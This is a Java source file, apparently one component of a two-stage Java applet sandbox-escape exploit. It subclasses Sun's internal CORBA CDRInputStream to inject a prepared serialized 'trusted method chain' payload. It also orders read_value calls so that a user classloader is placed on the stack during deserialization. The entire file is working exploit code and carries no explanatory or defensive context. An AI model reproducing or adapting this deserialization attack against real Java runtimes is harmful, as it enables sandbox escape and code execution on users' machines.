twostage/src-exploit/x/MyMaliciousInputStream.java
package x;
import java.io.InputStream;
import java.nio.ByteBuffer;
import com.sun.corba.se.impl.encoding.CDRInputStream;
import com.sun.corba.se.impl.encoding.CodeSetConversion.BTCConverter;
import com.sun.corba.se.spi.ior.iiop.GIOPVersion;
public class MyMaliciousInputStream extends CDRInputStream {
private static final long serialVersionUID = 889128311636547341L;
static ByteBuffer createBuffer() {
// InputStream in = XAppletW.class.getResourceAsStream("/x/bytes.ser");
// byte[] bytes = new byte[100000];
// try {
// in.read(bytes,16,100000-16);
// } catch (Exception e) {
// e.printStackTrace();
// }
byte[] bytes = new byte[100000];
try {
System.arraycopy(CorbaTrustedMethodChain.serializedBytes, 0, bytes, 16, CorbaTrustedMethodChain.serializedBytes.length);
} catch (Exception e) {
e.printStackTrace();
}
return ByteBuffer.wrap(bytes);
}
public MyMaliciousInputStream() {
super(new MyORB(), createBuffer(), 10000, true, GIOPVersion.V1_2, (byte) 1, null);
read_long(); // To init ObjectInputStream
read_long(); // "
read_long(); // "
read_long(); // "
// This is a hack to make sure we have the user classloader
// on the stack for the first object we load.
try {
read_value(); // Read SerializableClassLoader and fail
} catch( Exception e ) {
// Yes, we fail!
}
try {
read_value(); // Read ClassLoaderHolder which makes it known
// to the ObjectInputStream.
} catch( Exception e ) {
// Yes, we fail!
}
}
@Override
protected BTCConverter createWCharBTCConverter() {
return null;
}
@Override
public CDRInputStream dup() {
// TODO Auto-generated method stub
return null;
}
}